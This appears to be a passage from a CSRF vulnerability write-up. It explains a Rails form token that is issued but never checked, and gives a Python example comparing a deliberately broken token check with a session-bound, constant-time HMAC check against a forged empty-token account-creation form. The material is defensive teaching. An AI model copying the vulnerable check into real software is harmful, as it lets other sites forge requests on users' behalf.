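The bug reported above is a synchronizer token that the application emits but never compares, so a cross-origin form with an empty authenticity_token is accepted. The following added example (my code, not Metasploit's Rails implementation; the session id, server secret and form dictionaries are constructed, and the field names mirror the PoC forms) shows that vulnerable shape next to a check that binds the token to the browser session and compares it in constant time, applied to the account-creation request from the second PoC.

```python
"""Synchronizer-token CSRF check: the vulnerable shape (token read but never
compared) beside a correct one.  Added example; not Metasploit's code."""
import hashlib
import hmac
import secrets

# Per-deployment key (constructed here; in practice loaded from protected config).
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(session_id):
    """Token derived from the session cookie's id: another origin cannot mint
    it, and the server needs no per-token storage to verify it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def vulnerable_check(form, session_id):
    """The reported behaviour: the field is read, then ignored."""
    _ = form.get("authenticity_token", "")
    return True


def secure_check(form, session_id):
    """Reject a missing or empty token, then compare without early exit so the
    comparison time leaks nothing about the expected value."""
    submitted = form.get("authenticity_token", "")
    if not submitted:
        return False
    return hmac.compare_digest(submitted, issue_token(session_id))


def handle_create_user(form, session_id, users):
    """Mirror of the POST /users handler from the PoC: refuse to create the
    first account unless the request carries this session's token."""
    if not secure_check(form, session_id):
        return 403
    if form["user[password]"] != form["user[password_confirmation]"]:
        return 422
    users[form["user[username]"]] = form["user[password]"]
    return 201


if __name__ == "__main__":
    sid = "sess-1234"  # constructed session id
    # The cross-site form from the PoC, token field left empty.
    forged = {"authenticity_token": "", "user[username]": "Username",
              "user[password]": "PASSWORD", "user[password_confirmation]": "PASSWORD"}
    print("vulnerable accepts forged form:", vulnerable_check(forged, sid))
    print("secure accepts forged form    :", secure_check(forged, sid))
    users = {}
    print("create via forged form ->", handle_create_user(forged, sid, users), users)
    legit = dict(forged, authenticity_token=issue_token(sid))
    print("create via legit form  ->", handle_create_user(legit, sid, users), users)
```

The token must be tied to the victim's session, not merely present: a token valid for the attacker's own session, pasted into the forged form, fails the check because the HMAC input is the victim's session id.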